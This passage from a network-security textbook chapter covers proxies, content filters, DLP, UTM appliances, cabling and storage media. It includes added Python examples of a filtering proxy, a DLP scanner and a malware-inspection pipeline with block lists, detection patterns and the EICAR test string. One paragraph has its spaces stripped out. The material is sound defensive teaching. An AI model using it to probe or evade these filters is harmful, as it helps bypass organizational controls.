As networks can be spread out literally around the world, it is not feasible to have a person visit each device for control functions. Software enables controllers at NOCs to measure the actual performance of network devices and make changes to the configuration and operation of devices remotely. The ability to make remote connections with this level of functionality is both a blessing and a security issue. Although this allows efficient network operations management, it also provides an opportunity for unauthorized entry into a network. For this reason, a variety of security controls are used, from secondary networks to VPNs and advanced authentication methods with respect to network control connections. Network monitoring is an ongoing concern for any significant network.
In addition to monitoring traffic flow and efficiency, monitoring of security-related events is necessary. IDSs act merely as alarms, indicating the possibility of a breach associated with a specific set of activities. These indications still need to be investigated and an appropriate response needs to be initiated by security personnel. Simple items such as port scans may be ignored by policy, but an actual unauthorized entry into a network router, for instance, would require NOC personnel to take specific actions to limit the potential damage to the system. In any significant network, coordinating system changes, dynamic network traffic levels, potential security incidents, and maintenance activities is a daunting task requiring numerous personnel working together. Software has been developed to help manage the information flow required to support these tasks. Such software can enable remote administration of devices in a standard fashion, so that the control systems can be devised in a hardware vendor–neutral configuration.
SNMP is the main standard embraced by vendors to permit interoperability. Although SNMP has received a lot of security-related attention of late due to various security holes in its implementation, it is still an important part of a security solution associated with network infrastructure. Many useful tools have security issues; the key is to understand the limitations and to use the tools within correct boundaries to limit the risk associated with the vulnerabilities. Blind use of any technology will result in increased risk, and SNMP is no exception. Proper planning, setup, and deployment can limit exposure to vulnerabilities. Continuous auditing and maintenance of systems with the latest patches is a necessary part of operations and is essential to maintaining a secure posture.
Load Balancers
Certain systems, such as servers, are more critical to business operations and should therefore be the object of fault-tolerance measures. Load balancers are designed to distribute the processing load over two or more systems. They are used to help improve resource utilization and throughput but also have the added advantage of increasing the fault tolerance of the overall system since a critical process may be split across several systems. Should any one system fail, the others can pick up the processing it was handling.
ProxiesProxiesservetomanageconnectionsbetweensystems,actingasrelaysforthetraffic.Proxiescanfunctionatthecircuitlevel,wheretheysupportmultipletraffictypes,ortheycanbeapplication-levelproxies,whicharedesignedtorelayspecificapplicationtraffic.AnHTTPproxycanmanageanHTTPconversationasitunderstandsthetypeandfunctionofthecontent.Application-specificproxiescanserveassecuritydevicesiftheyareprogrammedwithspecificrulesdesignedtoprovideprotectionagainstundesiredcontent.Thoughnotstrictlyasecuritytool,aproxyserver(orsimplyproxy)can
beusedtofilteroutundesirabletrafficandpreventemployeesfromaccessingpotentiallyhostilewebsites.Aproxyservertakesrequestsfromaclientsystemandforwardsthemtothedestinationserveronbehalfofthe
client,asshowninFigure10.8.Proxyserverscanbecompletelytransparent(theseareusuallycalledgatewaysortunnelingproxies),oraproxyservercanmodifytheclientrequestbeforesendingiton,orevenservetheclient’srequestwithoutneedingtocontactthedestinationserver.Severalmajorcategoriesofproxyserversareinuse:
•Figure10.8HTTPproxyhandlingclientrequestsandwebserverresponses
Anonymizing proxy: An anonymizing proxy is designed to hide information about the requesting system and make a user's web browsing experience "anonymous." This type of proxy service is often used by individuals who are concerned about the amount of personal information being transferred across the Internet and the use of tracking cookies and other mechanisms to track browsing activity. Note that the proxy itself sees every request in full, so the user is simply moving trust from the destination sites to the proxy operator.
Caching proxy: This type of proxy keeps local copies of popular client requests and is often used in large organizations to reduce bandwidth usage and increase performance. When a request is made, the proxy server first checks to see whether it has a current copy of the requested content in the cache; if it does, it services the client request immediately without having to contact the destination server. If the content is old or the caching proxy does not have a copy of the requested content, the request is forwarded to the destination server.
Content-filtering proxy: Content-filtering proxies examine each client request and compare it to an established acceptable use policy (AUP). Requests can usually be filtered in a variety of ways, including by the requested URL, destination system, or domain name, or by keywords in the content itself. Content-filtering proxies typically support user-level authentication, so access can be controlled and monitored and activity through the proxy can be logged and analyzed. This type of proxy is very popular in schools, corporate environments, and government networks.
Open proxy: An open proxy is essentially a proxy that is available to any Internet user and often has some anonymizing capabilities as well. This type of proxy has been the subject of some controversy, with advocates for Internet privacy and freedom on one side of the argument, and law enforcement, corporations, and government entities on the other side. As open proxies are often used to circumvent corporate proxies, many corporations attempt to block the use of open proxies by their employees.
Reverse proxy: A reverse proxy is typically installed on the server side of a network connection, often in front of a group of web servers. The reverse proxy intercepts all incoming web requests and can perform a number of functions, including traffic filtering and shaping, SSL/TLS decryption, serving of common static content such as graphics, and performing load balancing.
Web proxy: A web proxy is solely designed to handle web traffic and is sometimes called a web cache. Most web proxies are essentially specialized caching proxies.
Exam Tip: A proxy server is a system or application that acts as a go-between for clients' requests for network services. The client tells the proxy server what it wants and, if the client is authorized to have it, the proxy server connects to the appropriate network service and gets the client what it asked for. Web proxies are the most commonly deployed type of proxy server.
Deploying a proxy solution within a network environment is usually done either by setting up the proxy and requiring all client systems to configure their browsers to use the proxy or by deploying an intercepting proxy that actively intercepts all requests without requiring client-side configuration. A browser-configured proxy is only as effective as the egress rules behind it: a client that simply ignores the proxy setting must be stopped by a firewall that permits outbound web traffic from the proxy alone. From a security perspective, proxies are most useful in their ability to control and filter outbound requests. By limiting the types of content and websites employees can access from corporate systems, many administrators hope to avoid loss of corporate data, hijacked systems, and infections from malicious websites. Administrators also use proxies to enforce corporate AUPs and track use of corporate resources. Most proxies can be configured to either allow or require individual user authentication; this gives them the ability to log and control activity based on specific users or groups. For example, an organization might want to allow the human resources group to browse Facebook during business hours but not allow the rest of the organization to do so.
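As an added example (not the book's code), the decision logic of a content-filtering, caching forward proxy: it authenticates the user from the `Proxy-Authorization` header, applies the AUP checks the text lists (blocked domains, keywords in the URL, a group exception with a business-hours window, like the human resources case above), then serves from a freshness-checked cache before contacting the origin, and logs every decision. There are no sockets; the request, the user database, the block lists, and the `origin` callback are constructed for illustration.

```python
"""Added example (not from the book): the policy, cache and audit logic of a
content-filtering forward proxy. Users, lists and the origin are constructed."""
import base64
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed policy data (hypothetical).
BLOCKED_DOMAINS = {"malware.example", "phish.example"}
BLOCKED_KEYWORDS = {"casino", "warez"}
GROUP_EXCEPTIONS = {"hr": ({"facebook.com"}, (9, 17))}   # group -> (sites, hours)
USERS: Dict[str, Tuple[str, str]] = {                    # user -> (password, group)
    "alice": ("hr-pass", "hr"),
    "bob": ("eng-pass", "eng"),
}


@dataclass
class CacheEntry:
    body: bytes
    expires: float


@dataclass
class Proxy:
    cache: Dict[str, CacheEntry] = field(default_factory=dict)
    audit: List[str] = field(default_factory=list)

    def authenticate(self, headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
        """HTTP Basic credentials carried in Proxy-Authorization -> (user, group)."""
        hdr = headers.get("Proxy-Authorization", "")
        if not hdr.startswith("Basic "):
            return None
        try:
            user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
        except Exception:
            return None
        rec = USERS.get(user)
        return (user, rec[1]) if rec and rec[0] == pw else None

    def decide(self, url: str, group: str, hour: int) -> Tuple[bool, str]:
        """Apply the AUP: domain list, URL keywords, then per-group exceptions."""
        host = (urlsplit(url).hostname or "").lower()
        if host in BLOCKED_DOMAINS:
            return False, "blocked-domain"
        for kw in BLOCKED_KEYWORDS:
            if kw in url.lower():
                return False, f"keyword:{kw}"
        for grp, (domains, (start, end)) in GROUP_EXCEPTIONS.items():
            if host in domains:
                if group == grp and start <= hour < end:
                    return True, f"group-exception:{grp}"
                return False, "restricted-site"
        return True, "allowed"

    def cache_get(self, url: str, now: float) -> Optional[bytes]:
        entry = self.cache.get(url)
        if entry and entry.expires > now:
            return entry.body
        self.cache.pop(url, None)          # stale or missing: drop it
        return None

    def cache_put(self, url: str, body: bytes, ttl: float, now: float) -> None:
        self.cache[url] = CacheEntry(body, now + ttl)

    def handle(self, url: str, headers: Dict[str, str], hour: int,
               now: float, origin) -> Tuple[int, str]:
        """Return (status, source); `origin(url)` stands in for the real server."""
        ident = self.authenticate(headers)
        if ident is None:
            self.audit.append(f"{now:.0f} - 407 {url}")
            return 407, "proxy-auth-required"
        user, group = ident
        ok, reason = self.decide(url, group, hour)
        self.audit.append(f"{now:.0f} {user}/{group} {'ALLOW' if ok else 'DENY'} {url} ({reason})")
        if not ok:
            return 403, reason
        if self.cache_get(url, now) is not None:
            return 200, "cache"
        body, ttl = origin(url)
        self.cache_put(url, body, ttl, now)
        return 200, "origin"


def basic_auth(user: str, pw: str) -> Dict[str, str]:
    """The Proxy-Authorization header a browser sends after a 407."""
    return {"Proxy-Authorization": "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()}


def demo() -> List[Tuple[int, str]]:
    """Constructed traffic against a fake origin serving 60-second-cacheable pages."""
    p = Proxy()
    origin = lambda url: (b"<html>" + url.encode() + b"</html>", 60.0)
    t0, bob, alice = 1_000_000.0, basic_auth("bob", "eng-pass"), basic_auth("alice", "hr-pass")
    return [
        p.handle("http://intranet.example/", {}, 10, t0, origin),           # no credentials
        p.handle("http://intranet.example/", bob, 10, t0, origin),          # fetched from origin
        p.handle("http://intranet.example/", bob, 10, t0 + 30, origin),     # served from cache
        p.handle("http://intranet.example/", bob, 10, t0 + 90, origin),     # stale, refetched
        p.handle("http://malware.example/x", bob, 10, t0, origin),          # blocked domain
        p.handle("http://facebook.com/", alice, 10, t0, origin),            # HR, business hours
        p.handle("http://facebook.com/", bob, 10, t0, origin),              # not HR
        p.handle("http://facebook.com/", alice, 20, t0, origin),            # HR, after hours
    ]
```

The policy decision runs before the cache lookup on purpose: once Alice's fetch of the site has populated the cache, Bob's request must still be refused rather than quietly served from it, so the authorization and caching layers cannot be reordered for speed.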
Web Security Gateways
Some security vendors combine proxy functions with content-filtering functions to create a product called a web security gateway. Web security gateways are intended to address the security threats and pitfalls unique to web-based traffic. Web security gateways typically provide the following capabilities:
Real-time malware protection (a.k.a. malware inspection): The ability to scan all outgoing and incoming web traffic to detect and block undesirable traffic such as malware, spyware, adware, malicious scripts, file-based attacks, and so on.
Content monitoring: The ability to monitor the content of web traffic being examined to ensure that it complies with organizational policies.
Productivity monitoring: The ability to measure types and quantities of web traffic that is being generated by specific users, groups of users, or the entire organization.
Data protection and compliance: Scanning web traffic for sensitive or proprietary information being sent outside of the organization, as well as the use of social network sites or inappropriate sites.
Internet Content Filters
With the dramatic proliferation of Internet traffic and the push to provide Internet access to every desktop, many corporations have implemented content-filtering systems, called Internet content filters, to protect them from employees' viewing of inappropriate or illegal content at the workplace and the subsequent complications that occur when such viewing takes place. Internet content filtering is also popular in schools, libraries, homes, government offices, and any other environment where there is a need to limit or restrict access to undesirable content. In addition to filtering undesirable content, such as pornography, some content filters can also filter out malicious activity such as browser hijacking attempts or XSS attacks. In many cases, content filtering is performed with or as a part of a proxy solution, as the content requests can be filtered and serviced by the same device. Content can be filtered in a variety of ways, including via the requested URL, the destination system, the domain name, by keywords in the content itself, and by type of file requested.
The term "Internet content filter" or "content filter" is applied to any device, application, or software package that examines network traffic (especially web traffic) for undesirable or restricted content. A content filter could be a software package loaded on a specific PC or a network appliance capable of filtering an entire organization's web traffic.
Content-filtering systems face many challenges, because the ever-changing Internet makes it difficult to maintain lists of undesirable sites (sometimes called blacklists); terms used on a medical site can also be used on a pornographic site, making keyword filtering challenging; and determined users are always seeking ways to bypass proxy filters. Keyword and file-type filtering also require the filter to see the content, so HTTPS traffic is opaque to a network filter unless it terminates and re-encrypts the TLS session, which brings its own certificate-management and privacy costs. To help administrators, most commercial content-filtering solutions provide an update service, much like IDS or antivirus products, that updates keywords and undesirable sites automatically.
Data Loss Prevention
Data loss prevention (DLP) refers to technology employed to detect and prevent unauthorized transfers of data out of an enterprise. Employed at key locations, DLP technology can scan packets for specific data patterns. This technology can be tuned to detect account numbers, secrets, specific markers, or files. When specific data elements are detected, the system can block the transfer. The primary challenge in employing DLP technologies is the placement of the sensor. The DLP sensor needs to be able to observe the data, so if the channel is encrypted, DLP technology can be thwarted. This is why network DLP is normally paired with TLS interception at the proxy, or with endpoint agents that inspect the data before it is encrypted.
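An added example, not code from the book, of the matching a DLP sensor performs on an outbound payload: a card-number pattern tightened with the Luhn check so that random digit runs do not trip it, a US SSN pattern, and an organization-specific marker string. It also demonstrates the placement caveat from the paragraph above: the same scanner finds nothing once the payload is encrypted. The "encryption" is a toy XOR keystream standing in for TLS, the marker `ACME-CONFIDENTIAL` is hypothetical, and the message is constructed (the card number is the standard 4111... test PAN).

```python
"""Added example (not from the book): DLP pattern matching on an outbound
payload, and the blind spot an encrypted channel creates for it."""
import re
from dataclasses import dataclass
from typing import List

CARD_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
MARKER_RE = re.compile(r"ACME-CONFIDENTIAL", re.IGNORECASE)   # hypothetical marker


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, as used for card numbers; filters random digit runs."""
    total, parity = 0, len(digits) % 2
    for i, ch in enumerate(digits):
        d = int(ch)
        if i % 2 == parity:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


@dataclass
class Finding:
    kind: str
    value: str


def scan(payload: bytes) -> List[Finding]:
    """Pattern-match a payload; ciphertext or binary data yields nothing."""
    text = payload.decode("utf-8", errors="replace")
    findings = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            findings.append(Finding("card", digits))
    for m in SSN_RE.finditer(text):
        findings.append(Finding("ssn", m.group()))
    for m in MARKER_RE.finditer(text):
        findings.append(Finding("marker", m.group()))
    return findings


def verdict(payload: bytes) -> str:
    return "BLOCK" if scan(payload) else "ALLOW"


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Toy keystream cipher standing in for TLS: the sensor sees only ciphertext."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def demo() -> dict:
    # Constructed outbound message: a marker, a valid test PAN, an SSN, and a
    # 13-digit order reference that must NOT be flagged (fails Luhn).
    msg = (b"ACME-Confidential\n"
           b"Customer card 4111 1111 1111 1111, SSN 123-45-6789\n"
           b"Order ref 1234567890123 (not a card)\n")
    clear = scan(msg)
    enc = xor_stream(msg, b"secret-key")
    return {
        "clear_kinds": sorted(f.kind for f in clear),
        "clear_verdict": verdict(msg),
        "encrypted_findings": len(scan(enc)),
        "encrypted_verdict": verdict(enc),
    }
```

The order reference is the reason for the Luhn check: a bare 13-to-19-digit regex would block it and every invoice number like it, and a DLP deployment that blocks on false positives gets switched off. The zero findings on the encrypted copy are the placement problem in one line: put the sensor where it sees plaintext.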
Unified Threat Management
Many security vendors offer "all-in-one security appliances," which are devices that combine multiple functions into the same hardware appliance. Most commonly these functions are firewall, IDS/IPS, and antivirus, although all-in-one appliances can include VPN capabilities, antispam, malicious web traffic filtering, antispyware, content filtering, traffic shaping, and so on. All-in-one appliances are often sold as being cheaper, easier to manage, and more efficient than having separate solutions that accomplish each of the functions the all-in-one appliance is capable of performing. A common name for these all-in-one appliances is a unified threat management (UTM) appliance. Using a UTM solution simplifies the security activity as a single task, under a common software package for operations. This reduces the learning curve to a single tool rather than a collection of tools. A UTM solution can have better integration and efficiencies in handling network traffic and incidents than a collection of tools connected together. The trade-off is concentration: the one box is a single point of failure, a single point of compromise, and, once every engine is enabled, frequently the throughput bottleneck, so it should be sized and made redundant accordingly. Figure 10.9 illustrates the advantages of UTM processing. Rather than processing elements in a linear fashion, as shown in Figure 10.9a, the packets are processed in a parallelized fashion (Figure 10.9b). There is a need to coordinate between the elements, and many modern solutions do this with parallelized hardware.

• Figure 10.9 Unified threat management architecture
URL Filtering
URL filters block connections to websites that are in a prohibited list. The use of a UTM appliance, typically backed by a service to keep the list of prohibited websites updated, provides an automated means to block access to sites deemed dangerous or inappropriate. Because of the highly volatile nature of web content, automated enterprise-level protection is needed to ensure a reasonable chance of blocking sources of inappropriate content, malware, and other malicious content.
Content Inspection
Instead of just relying on a URL to determine the acceptability of content, UTM appliances can also inspect the actual content being served. Content inspection is used to filter web requests that return content with specific components, such as names of body parts, music or video content, and other content that is inappropriate for the business environment.
Malware Inspection
Malware is another item that can be detected during network transmission, and UTM appliances can be tuned to detect malware. Network-based malware detection has the advantage of having to update only a single system as opposed to all machines. It does not replace endpoint antivirus, however: malware that arrives over a channel the appliance cannot decrypt, or on removable media, never crosses it.
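As an added example (not the book's code), a UTM-style inspection pipeline covering the three checks just described: a URL filter against a categorized list that can be refreshed from a feed, content inspection of the returned body by file signature, and malware inspection by the EICAR test string and a hash list. The three engines run concurrently over the same flow, in the spirit of Figure 10.9b, and any block wins. The category list, the hash list, the hostnames, and the flows are all constructed; a real appliance pulls its lists from a vendor update service.

```python
"""Added example (not from the book): parallel URL, content and malware
inspection of one flow, with an updatable URL category list. Lists are constructed."""
import hashlib
import re
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed list data (hypothetical hostnames and hashes).
URL_CATEGORIES: Dict[str, str] = {"evil.example": "malware", "bets.example": "gambling"}
BLOCKED_CATEGORIES = {"malware", "gambling"}
CONTENT_RULES = {
    "video": re.compile(rb"\x1aE\xdf\xa3|ftypmp4"),   # WebM / MP4 signatures
    "executable": re.compile(rb"^MZ"),                # Windows PE header
}
# The EICAR antivirus test string and a hash list of known-bad samples.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed-sample").hexdigest()}


@dataclass
class Flow:
    url: str
    body: bytes


def url_filter(f: Flow) -> str:
    host = (urlsplit(f.url).hostname or "").lower()
    cat = URL_CATEGORIES.get(host, "uncategorised")
    return f"url:block:{cat}" if cat in BLOCKED_CATEGORIES else "url:ok"


def content_inspect(f: Flow) -> str:
    for label, rx in CONTENT_RULES.items():
        if rx.search(f.body):
            return f"content:block:{label}"
    return "content:ok"


def malware_inspect(f: Flow) -> str:
    if EICAR in f.body:
        return "malware:block:eicar"
    if hashlib.sha256(f.body).hexdigest() in KNOWN_BAD_SHA256:
        return "malware:block:hash"
    return "malware:ok"


CHECKS = (url_filter, content_inspect, malware_inspect)


def inspect_parallel(f: Flow) -> Dict[str, object]:
    """Run every engine concurrently on the same flow; block if any engine blocks."""
    with ThreadPoolExecutor(max_workers=len(CHECKS)) as pool:
        results = list(pool.map(lambda chk: chk(f), CHECKS))
    reasons = [r for r in results if ":block:" in r]
    return {"action": "block" if reasons else "allow", "reasons": reasons}


def update_url_list(feed: Dict[str, str]) -> int:
    """Merge a (constructed) vendor feed into the category list; returns list size."""
    URL_CATEGORIES.update({h.lower(): c for h, c in feed.items()})
    return len(URL_CATEGORIES)


def demo() -> List[Dict[str, object]]:
    flows = [
        Flow("http://news.example/a", b"<html>plain page</html>"),
        Flow("http://bets.example/poker", b"<html>poker</html>"),
        Flow("http://files.example/tool.exe", b"MZ\x90\x00" + b"\x00" * 64),
        Flow("http://cdn.example/av-test", b"payload:" + EICAR),
        Flow("http://evil.example/drop", b"constructed-sample"),
    ]
    return [inspect_parallel(f) for f in flows]
```

Because the engines are independent, the last flow is blocked for two reasons at once, which is what the parallel architecture buys: the malware engine is not skipped just because the URL filter fired first, and the log shows both.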
Media
The base of communications between devices is the physical layer of the OSI model. This is the domain of the actual connection between devices, whether by wire, fiber, or radio frequency waves. The physical layer separates the definitions and protocols required to transmit the signal physically between boxes from higher-level protocols that deal with the details of the data itself. Four common methods are used to connect equipment at the physical layer:
Coaxial cable
Twisted-pair cable
Fiber-optics
Wireless
Coaxial Cable
Coaxial cable is familiar to many households as a method of connecting televisions to VCRs or to satellite or cable services. It is used because of its high bandwidth and shielding capabilities. Compared to standard twisted-pair lines such as telephone lines, coaxial cable ("coax") is much less prone to outside interference. It is also much more expensive to run, both from a cost-per-foot measure and from a cable-dimension measure. Coax costs much more per foot than standard twisted-pair wires and carries only a single circuit for a large wire diameter.

• A coax connector

An original design specification for Ethernet connections, coax was used from machine to machine in early Ethernet implementations. The connectors were easy to use and ensured good connections, and the limited distance of most office LANs did not carry a large cost penalty. Today, almost all of this older Ethernet specification has been replaced by faster, cheaper twisted-pair alternatives, and the only place you're likely to see coax in a data network is from the cable box to the cable modem.

• A typical 8-wire UTP line

Because of its physical nature, it is possible to drill a hole through the outer part of a coax cable and connect to the center conductor. This is called a "vampire tap" and is an easy method to get access to the signal and data being transmitted.
UTP/STP
Twisted-pair wires have all but completely replaced coaxial cables in Ethernet networks. Twisted-pair wires use the same technology used by the phone company for the movement of electrical signals. Single pairs of twisted wires reduce electrical crosstalk and electromagnetic interference. Multiple groups of twisted pairs can then be bundled together in common groups and easily wired between devices.

• A typical 8-wire STP line

• A bundle of UTP wires

Twisted pairs come in two types, shielded and unshielded. Shielded twisted-pair (STP) has a foil shield around the pairs to provide extra shielding from electromagnetic interference. Unshielded twisted-pair (UTP) relies on the twist to eliminate interference. UTP has a cost advantage over STP and is usually sufficient for connections, except in very noisy electrical areas.
Twisted-pair lines are categorized by the level of data transmission they can support. Three current categories are in use:
Category 3 (Cat 3): Minimum for voice and 10-Mbps Ethernet.
Category 5 (Cat 5/Cat 5e): For 100-Mbps Fast Ethernet; Cat 5e is an enhanced version of the Cat 5 specification that addresses far-end crosstalk and is suitable for 1000 Mbps.
Category 6 (Cat 6/Cat 6a): For 10-Gigabit Ethernet over short distances (Cat 6 carries 10 Gbps only to roughly 55 m); Cat 6a is used for longer 10-Gbps runs, up to the full 100 m.
The standard method for connecting twisted-pair cables is via an 8-pin connector, called an RJ-45 connector, that looks like a standard phone jack connector but is slightly larger. One nice aspect of twisted-pair cabling is that it's easy to splice and change connectors. Many a network administrator has made Ethernet cables from stock Cat 5 wire, two connectors, and a crimping tool. This ease of connection is also a security issue; because twisted-pair cables are easy to splice into, rogue connections for sniffing could be made without detection in cable runs. Both coax and fiber are much more difficult to splice because each requires a tap to connect, and taps are easier to detect.
Fiber
Fiber-optic cable uses pulses of light, from a laser or an LED, to connect devices over a thin glass strand. The biggest advantage to fiber is its bandwidth, with transmission capabilities into the terabits per second range. Fiber-optic cable is used to make high-speed connections between servers and is the backbone medium of the Internet and large networks. For all of its speed and bandwidth advantages, fiber has one major drawback: cost. The cost of using fiber is a two-edged sword. When measured by bandwidth, using fiber is cheaper than using competing wired technologies. The length of runs of fiber can be much longer, and the data capacity of fiber is much higher. But connections to a fiber are difficult and expensive, and splicing fiber requires specialized fusion or mechanical splicing equipment. Making the precise connection on the end of a fiber-optic line is a highly skilled job and is done by specially trained professionals who maintain a level of proficiency. Once the connector is fitted on the end, several forms of connectors and blocks are used, as shown in the accompanying images.

• A type of fiber terminator

• A typical fiber-optic fiber, terminator, and connector block

Field splicing of fiber is impractical without that equipment; the usual solution is to add connectors and connect through a repeater or patch panel. This adds to the security of fiber, in that unauthorized connections are very hard to make covertly: an optical tap introduces measurable signal loss, which link monitoring or an OTDR trace can reveal. The high cost of connections to fiber and the higher cost of fiber per foot also make it less attractive for the final mile in public networks where users are connected to the public switching systems. For this reason, cable companies use coax and DSL providers use twisted-pair to handle the "last mile" scenario.
Unguided Media
Electromagnetic waves have been transmitted to convey signals literally since the inception of radio. Unguided media is a phrase used to cover all transmission media not guided by wire, fiber, or other constraints; it includes radio frequency, infrared, and microwave methods. Unguided media have one attribute in common: they are unguided and as such can travel to many machines simultaneously. Transmission patterns can be shaped by antennas, but the target machine can be one of many in a reception zone. As such, security principles are even more critical, as they must assume that unauthorized users have access to the signal.
Infrared
Infrared (IR) is a band of electromagnetic energy just beyond the red end of the visible color spectrum. IR has been used in remote-control devices for years. IR made its debut in computer networking as a wireless method to connect to printers. Now that wireless keyboards, wireless mice, and mobile devices exchange data via IR, it seems to be everywhere. IR can also be used to connect devices in a network configuration, but it is slow compared to other wireless technologies. IR cannot penetrate walls but instead bounces off them. Nor can it penetrate other solid objects, so if you stack a few items in front of the transceiver, the signal is lost.
RF/Microwave
The use of radio frequency (RF) waves to carry communication signals goes back to the beginning of the 20th century. RF waves are a common method of communicating in a wireless world. They use a variety of frequency bands, each with special characteristics. The term microwave is used to describe a specific portion of the RF spectrum that is used for communication and other tasks, such as cooking. Point-to-point microwave links have been installed by many network providers to carry communications over long distances and rough terrain. Many different frequencies are used in the microwave bands for many different purposes. Today, home users can use wireless networking throughout their house and enable laptops to surf the Web while they're moved around the house. Corporate users are experiencing the same phenomenon, with wireless networking enabling corporate users to check e-mail on laptops while riding a shuttle bus on a business campus. These wireless solutions are covered in detail in Chapter 12.
Tech Tip
Wireless Options
There are numerous radio-based alternatives for carrying network traffic. They vary in capacity, distance, and other features. Commonly found examples are WiFi, WiMAX, ZigBee, Bluetooth, 900 MHz, and NFC. Understanding the security requirements associated with each is important and is covered in more detail in Chapter 12.
One key feature of microwave communications is that microwave RF energy can penetrate reasonable amounts of building structure. This allows you to connect network devices in separate rooms, and it can remove the constraints on equipment location imposed by fixed wiring. Another key feature is broadcast capability. By its nature, RF energy is unguided and can be received by multiple users simultaneously. Microwaves allow multiple users access in a limited area, and microwave systems are seeing application as the last mile of the Internet in dense metropolitan areas. Point-to-multipoint microwave devices can deliver data communication to all the business users in a downtown metropolitan area through rooftop antennas, reducing the need for expensive building-to-building cables. Just as microwaves carry cell phone and other data communications, the same technologies offer a method to bridge the last-mile solution. The "last mile" problem is the connection of individual consumers to a backbone, an expensive proposition because of the sheer number of connections and unshared line at this point in a network. Again, cost is an issue, as transceiver equipment is expensive, but in densely populated areas, such as apartments and office buildings in metropolitan areas, the user density can help defray individual costs. Speed on commercial microwave links can exceed 10 Gbps, so speed is not a problem for connecting multiple users or for high-bandwidth applications.
Removable Media
One concept common to all computer users is data storage. Sometimes storage occurs on a file server and sometimes it occurs on movable media, allowing it to be transported between machines. Moving storage media represents a security risk from a couple of angles, the first being the potential loss of control over the data on the moving media. Second is the risk of introducing unwanted items, such as a virus or a worm, when the media are attached back to a network. Both of these issues can be remedied through policies and software. The key is to ensure that the policies are enforced and the software is effective. To describe media-specific issues, media can be divided into three categories: magnetic, optical, and electronic.
Removable and transportable media make the physical security of the data a more difficult task. The principal technical control for this problem is encryption, which is covered in Chapter 5.
Magnetic Media
Magnetic media store data through the rearrangement of magnetic particles on a nonmagnetic substrate. Common forms include hard drives, floppy disks, Zip disks, and magnetic tape. Although the specific format can differ, the basic concept is the same. All these devices share some common characteristics: each has sensitivity to external magnetic fields. Attach a floppy disk to the refrigerator door with a magnet if you want to test the sensitivity. They are also affected by high temperatures, as in fires, and by exposure to water.
Hard Drives
Hard drives used to require large machines in mainframes. Now they are small enough to attach to mobile devices. The concepts remain the same among all of them: a spinning platter rotates the magnetic media beneath heads that read the patterns in the oxide coating. As drives have gotten smaller and rotation speeds have increased, the capacities have also grown. Today gigabytes of data can be stored in a device slightly larger than a bottle cap. Portable hard drives in the 1 TB to 3 TB range are now available and affordable.

• 2 TB USB hard drive

One of the security controls available to help protect the confidentiality of the data is full drive encryption built into the drive hardware. Using a key that is controlled, through a Trusted Platform Module (TPM) interface for instance, this technology protects the data if the drive itself is lost or stolen. This may not be important if a thief takes the whole PC: when the TPM releases the key on its own, without a pre-boot PIN or smart card, the stolen machine unlocks its own drive at boot and the protection then rests entirely on the operating system login. In larger storage environments, however, drives are placed in separate boxes and remotely accessed, and a drive pulled from such an array is unreadable without its key. In the specific case of notebook machines, this layer can be tied to smart card interfaces to provide more security. As this is built into the controller, encryption algorithms such as Advanced Encryption Standard (AES) and Triple Data Encryption Standard (3DES) can be performed at full drive speed.
Diskettes
Floppy disks were the computer industry's first attempt at portable magnetic media. The movable medium was placed in a protective sleeve, and the drive remained in the machine. Capacities up to 1.4 MB were achieved, but the fragility of the device as the size increased, as well as competing media, has rendered floppies almost obsolete. Diskettes are part of history now.
Tape
Magnetic tape has held a place in computer centers since the beginning of computing. Its primary use has been bulk offline storage and backup. Tape functions well in this role because of its low cost. The disadvantage of tape is its nature as a serial access medium, making it slow to work with for large quantities of data. Several types of magnetic tape are in use today, ranging from quarter inch to digital linear tape (DLT) and digital audio tape (DAT). These cartridges can hold upward of 60 GB of compressed data. Tapes are still a major concern from a security perspective, as they are used to back up many types of computer systems. The physical protection afforded the tapes is of concern, because if a tape is stolen, an unauthorized user could set up a compatible drive and restore your data on his own system, because it's all stored on the tape. Offsite storage is needed for proper disaster recovery protection, but secure offsite storage and transport is what is really needed. This important issue is frequently overlooked in many facilities. The simple solution to maintain control over the data even when you can't control the tape is through encryption. Backup utilities can secure the backups with encryption, but this option is frequently not used, for a variety of reasons. Regardless of the rationale for not encrypting data, once a tape is lost, not using the encryption option becomes a lamented decision. The encryption key then becomes the thing that must survive a disaster: keep it escrowed separately from the tapes, and test a restore with it, or the backup is as unreadable to you as to the thief.

• A magnetic tape cartridge for backups
Optical Media
Optical media involve the use of a laser to read data stored on a physical device. Instead of having a magnetic head that picks up magnetic marks on a disk, a laser picks up deformities embedded in the media that contain the information. As with magnetic media, optical media can be read-write, although the read-only version is still more common.
CD-R/DVD
The compact disc (CD) took the music industry by storm, and then it took the computer industry by storm as well. A standard CD holds more than 640 MB of data, in some cases up to 800 MB. The digital video disc (DVD) can hold almost 5 GB of data single sided, 8.5 GB dual layer. These devices operate as optical storage, with microscopic pits pressed or burned into them to represent 1's and 0's. The most common type of CD is the read-only version, in which the data is written to the disc once and only read afterward. This has become a popular method for distributing computer software, although higher-capacity DVDs have replaced CDs for program distribution.

• A DVD (left) and CD (right)

A second-generation device, the recordable compact disc (CD-R), allows users to create their own CDs using a burner device in their PC and special software. Users can now back up data, make their own audio CDs, and use CDs as high-capacity storage. Their relatively low cost has made them economical to use. Pressed CDs have a thin layer of aluminum inside the plastic, into which the pits are molded when the disc is manufactured. CD-Rs use a reflective layer, such as gold, upon which a dye is placed that changes upon impact by the recording laser. A newer type, CD-RW, uses a phase-change recording layer instead of a dye, which allows discs to be erased and reused. The cost of the media increases from CD, to CD-R, to CD-RW.
Blu-ray Discs
